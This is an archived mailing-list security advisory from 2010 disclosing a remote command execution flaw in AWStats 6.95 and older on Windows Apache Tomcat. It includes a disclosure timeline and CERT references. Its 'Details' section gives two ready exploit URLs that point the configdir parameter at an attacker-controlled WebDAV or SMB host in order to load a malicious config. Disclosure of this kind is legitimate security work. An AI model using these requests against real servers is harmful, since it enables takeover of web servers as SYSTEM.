lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <6a84d6a3$7de30544$54bcab60$@com>
Date: Wed, 1 Dec 2010 08:22:34 -0800
From: "StenoPlasma @ ExploitDevelopment" <StenoPlasma@...loitdevelopment.com>
To: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.grok.org.uk>
Cc: stenoplasma@...loitdevelopment.com
Subject: AWStats 6.95 and Older Remote Command Execution
	When Installed on Windows Apache Tomcat (2010-WEB-001) (CERT
	VU#870532)

----------------------------------------------------------------------------
---------

www.ExploitDevelopment.com 2010-WEB-001 (CERT VU#870532)
----------------------------------------------------------------------------
---------


TITLE:


AWStats 6.95 and Older Remote Command Execution When Installed on Windows 
Apache Tomcat



SUMMARY AND IMPACT:


AWStats is vulnerable to remote command execution when installed on 
Apache Tomcat on Microsoft Windows operating systems. This issue is due 
to the way Apache Tomcat handles "\\" when specifying a configuration 
file directory. On a Windows XP AWStats system, an attacker can tell the
 remote server to call back to a WEBDAV enabled directory to pull the 
attacker's AWStats configuration file due to the "WebFolder" ability of 
the operating system. On a Windows 2003 or XP system, an attacker can 
tell the remote server to call back to a public SMB file share to pull 
the attacker's AWStats configuration file. The attacker's AWStats 
configuration file can contain arbitrary commands to be run on the 
vulnerable remote server as the web service account (The default web 
service account on Windows with Tomcat is the built in SYSTEM account). 
 An attacker can use this exploit to gain administrative control of a 
DMZ web server or a web server that has ties to an internal network.



DETAILS:


Use the following steps to exploit this vulnerability.



Attacking Windows XP Apache Tomcat AWStats Server:


http://VulnerableServer:8080/cgi-bin/awstats.cgi?config=attacker&pluginmode=
rawlog&configdir=\\Attacker-IPAddress:80\webdav



Attacking Windows 2003 or Windows XP AWStats Server:


http://VulnerableServer:8080/cgi-bin/awstats.cgi?config=attacker&pluginmode=
rawlog&configdir=\\Attacker-IPAddress\SMB-Share



VULNERABLE PRODUCTS:


AWStats Log Analyzer 6.95 and Older (AWStats 7.0 was fixed on 2010/08/18
 10:49:50 - http://awstats.sourceforge.net/docs/awstats_changelog.txt) 
running on Windows XP or Windows 2003 (Other Windows OS versions have 
not been tested).  AWStats must be installed on top of Apache Tomcat 
(All Versions).



REFERENCES AND ADDITIONAL INFORMATION:


N/A



CREDITS:


StenoPlasma (at) ExploitDevelopment.com



TIMELINE:


Discovery: May 1, 2010


Vendor Notified: May 16, 2010


Vendor Fixed: August 18, 2010


Vendor Notified of Disclosure: October 26, 2010


Disclosure to CERT: November 3, 2010

CERT Published: November 30, 2010


VENDOR URL:


http://awstats.sourceforge.net



ADVISORY URL:


http://www.exploitdevelopment.com/Vulnerabilities/2010-WEB-001.html
http://www.kb.cert.org/vuls/id/870532


VENDOR ADVISORY URL:


http://awstats.sourceforge.net/docs/awstats_changelog.txt


-----------------------------------------------------

StenoPlasma at ExploitDevelopment.com  

www.ExploitDevelopment.com

----------------------------------------------------- 

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ